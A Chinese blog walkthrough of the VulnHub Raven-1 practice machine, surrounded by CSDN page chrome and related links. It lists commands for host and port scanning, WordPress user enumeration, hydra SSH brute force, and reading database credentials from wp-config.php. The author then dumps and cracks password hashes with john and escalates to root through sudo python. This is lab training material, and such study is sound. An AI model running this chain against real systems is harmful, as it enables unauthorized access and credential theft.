Vulhub靶场之raven

最新推荐文章于 2024-05-31 10:23:56 发布
最新推荐文章于 2024-05-31 10:23:56 发布
阅读量612 收藏 1
点赞数
文章标签: 网络 安全 https
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42511731/article/details/125652945
版权

vulhub靶场学习之raven

环境准备

raven靶场下载

下载链接https://www.vulnhub.com/entry/raven-1,256/
在这里插入图片描述

下载完成后,使用VMware导入镜像启动
在这里插入图片描述

kali和raven都选择nat模式启动

1.信息收集

靶机ip收集

使用kali自带工具arp-scan扫描ip

什么是arp

地址解析协议(Address Resolution Protocol),其基本功能为透过目标设备的IP地址,查询目标设备的MAC地址,以保证通信的顺利进行。它是IPv4中网络层必不可少的协议,是根据IP地址获得物理地址MAC的一个TCP/IP协议。通过ARP,在局域网可以很容易构成一个ARP欺骗,从而得到有用数据信息。

arp-scan -l

-l 从网络接口配置生成地址

在这里插入图片描述

得到靶机ip后

进行nmap端口扫描

在这里插入图片描述

扫描得知靶机22,80,111端口开启,浏览器访问靶机
在这里插入图片描述

dirb扫描靶机网站

dirb http://192.168.30.140
在这里插入图片描述

可以看到有wordpress网站, 看到wordpress网站后台登录到入口
在这里插入图片描述

点击log in发现无法访问,网上搜索了一下得知解析有问题,需要在hosts配置下
在这里插入图片描述

能正常访问
在这里插入图片描述

因为探测到wordpress,所以直接上wordpress漏洞探测工具,这里使用kali自带的WPscan, 先暴力枚举用户名

wpscan --url http://$ip/wordpress/ -eu
在这里插入图片描述

收集到steven和michael两个用户,存到user.txt文件中

使用hydra工具暴力破解密码

cp /usr/share/wordlists/rockyou.txt pass

hydra -L user.txt -P pass 192.168.30.140 ssh

这里我使用的是新版kali,rockyou.txt文件需要解压

使用gzip -d解压就行

获取到ssh登录到用户密码:michael

ssh连上,开始后续利用

查看靶机是否运行MySQL服务

在这里插入图片描述

切换到wordpress目录,发现config配置文件,可能存在用户密码

在这里插入图片描述

查看config文件,发现了数据库的用户密码

用户密码为:root、R@v3nSecurity

cat wp-config.php
在这里插入图片描述

用刚才收集到的数据库用户密码登录mysql

mysql -u root -p

R@v3nSecurity

show databases;

use wordpress;

show tables;

select * from wp_users;

在这里插入图片描述

发现两组用户密码

michael :$P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0

steven:$P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/
john解码,最后得到steven:pink84

把密码放入文件swn里面通过john解码

vim swn.txt

cat swn.txt

john swn.txt --wordlist=/usr/share/wordlists/rockyou.txt
在这里插入图片描述

提权

使用steven用户远程登录ssh

ssh steven@192.168.30.140

pink84

在这里插入图片描述

利用优化命令执行终端的命令提权

sudo python -c ‘import pty; pty.spawn(“/bin/bash”);’

在这里插入图片描述

aj998
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Raven:Javascript框架
05-05
掠夺Raven是一个创造性的编码框架,在Javascript环境中结合了在openFrameworks,Processing和Flash中看到的意识形态。 类按类型分开,因此可以轻松选择项目中需要框架的哪些部分。 虽然仍处于青春期,但正在进行重大...
Rraven:将R与Raven集成
04-28
拉文 Rraven软件包旨在促进R和()之间的数据交换。 提供了非常强大的工具来分析(动物)声音。 R可以简化复杂分析程序的自动化过程。 此外,R包(如 , 和 (以及其他))提供了其他分析方法,可作为发现的软件包...
靶场练习第二十四天~vulnhub靶场Raven-1
qq_57976347的博客
02-22 1112
一、准备工作 kali和靶机都选择NAT模式(kali与靶机同网段) 1.靶场环境 下载链接:Raven: 1 ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 (1)扫描靶机开放的端口及其服务 nmap -A 192.168.101.127 2.网站的信息收集 (1)靶机开放了80端口,先访问靶机网站看看有什么有用的信息 1.访问到http://
vulnhub靶场--Raven靶场
zzzzzzkeai的博客
12-08 367
vulnhub靶场--Raven靶场
vulhub靶场Raven2-MYSQL-UDF提权
最新发布
qq_55349490的博客
05-31 1061
/借助usf.so共享库创建do_system自定义函数//通过do_system函数执行命令。
vulnhub靶场Raven1
kukudeshuo的博客
08-08 459
vulnhub靶场Raven1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/raven-1,256/ 攻击机:kali(192.168.109.128) 靶机:Raven2(192.168.109.152) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标目标靶机 确定目标靶机IP地址为192.168.109.152 使用nmap扫描查看目标靶机端口开放情况
Vulnhub: Raven 2 靶场渗透实战 Walkthrough By V.K.R(上)
weixin_52641450的博客
10-30 816
raven2 靶场 walkthrough by V.K.R
Vulhub漏洞靶场搭建和使用
永远是少年
08-24 1万+
今天继续给大家介绍渗透测试相关知识,本文主要内容是Vulhub漏洞靶场搭建和使用。 一、Vulhub漏洞靶场介绍 二、Vulhub漏洞靶场搭建 (一)安装Docker (二)安装Docker-compose (三)下载Vulhub 三、Vulhub漏洞靶场使用
Raven
10-25
"Raven"在此语境下可能是指一种特定的字体或字体库。Raven字体以其独特的风格和设计特点,被广泛应用于各种设计项目,如网页设计、图形设计、出版物以及品牌标识等。 Raven字体可能具有以下特性: 1. **设计风格**...
raven
03-07
通过键入以下命令来git clone https://github.com/icebox827/raven 在终端中运行bundle install 在终端中运行db:create以创建数据库在终端中运行db:migrate以迁移数据库rails s 开始添加用户并创建事件现场演示技术...
RavenPy:用于设置和运行水文建模框架Raven的Python包装器
04-06
用pip下载并编译Raven 从Python配置,运行和解析Raven输出 参数,模型或分水岭的并行模拟 实用程序命令来创建网格权重文件 提取有关流域的地貌信息 从非流域估计模型参数的算法 将输出(流,存储)公开为xarray....
Vulhub靶场环境搭建
Python_0011的博客
09-21 1923
在Ubantu系统上搭建靶场环境。
Vulhub漏洞靶场搭建
dzqxwzoe的博客
06-18 4482
是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。旨在让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。
kali linux 下搭建 Vulhub 靶场(图文详解)
m0_63521991的博客
08-08 3962
【在kali linux 下搭建vulhub靶场及其依赖】关于kali、docker、vulhub的简介,靶场的开启、关闭、注意事项
渗透测试part(三):Vulhub配置及打靶(以Drupal CVE-2018-7600为例)
m0_56592545的博客
06-25 1122
本系列总共分成了三个部分,在第一部分中对渗透测试进行了简要的概述,第二部分通过VMware搭建了Vulnhub的一个靶机,第三部分则在Ubuntu操作系统中基于Vulhub搭建了一个靶机并借助kali的Metasploit工具快速完成了对Drupal的渗透。t=N5K3t=N5K3t=N5K3t=N5K3t=N5K3打靶-vulhub靶场-drupal-CVE-2018-7600_哔哩哔哩_bilibilihttps://www.bilibili.com/video/BV1Tv4y1C7GC/?
vulhub靶场搭建与使用
热门推荐
剁椒鱼头没剁椒的博客
11-26 1万+
本来是不想安装yum源的,但是在安装到Docker-compose的时候发现下载特别慢,然后搜了教程看了一下,说可以快一点,结果发现越弄越复杂,只能说一些教程并不适合自己,这里就按照教程上部分内容来。至于yum源部分,我觉得直接跳过吧,使用Vulhub上一键安装docket,可以直接跳到安装docker-compose,并且一键安装也就几分钟,而这个配置yum源,光更新就花费了十几分钟,至少对于我只是配置一个靶场系统,来说多此一举,也不准备拿这个靶场做其他的事,单单就是一个靶场,所以用处大。
【VulnHub】Raven: 2靶机的渗透测试
大方子
06-28 4086
总结和思考: 使用netdiscover探测内网存活主机 PHPMailer的漏洞反弹得到shell Python版的EXP修改 查看wordpress的wp-config.php配置文件得到数据库账号密码 MySQL版本 <= 7.14 5.6.32 5.5.51 可以利用UDF提权 KALI对EXP的编译 给程序chmod u+s 增加suid权限,可以以root权限运...
vulnhub靶场Raven2
kukudeshuo的博客
07-19 1497
vulnhub靶场Raven2 环境准备 攻击机:kali(192.168.58.130) 靶机:Raven2(192.168.58.157) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 使用nmap扫描查看目标靶机端口开放情况 开放端口:22、80、111、56784 浏览器访问目标靶机80端口 就是一个非常普通的页面,没有啥好利用的 网站目录结构扫描 dirb http://19
RAVEN toolbox
06-12
RAVEN (Risk Analysis and Virtual ENvironment)是一个开源框架,用于进行风险分析和不确定性量化。RAVEN工具箱由意大利国家新技术、能源和可持续经济发展机构(ENEA)开发,旨在为科学家和工程师提供一个灵活和可...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值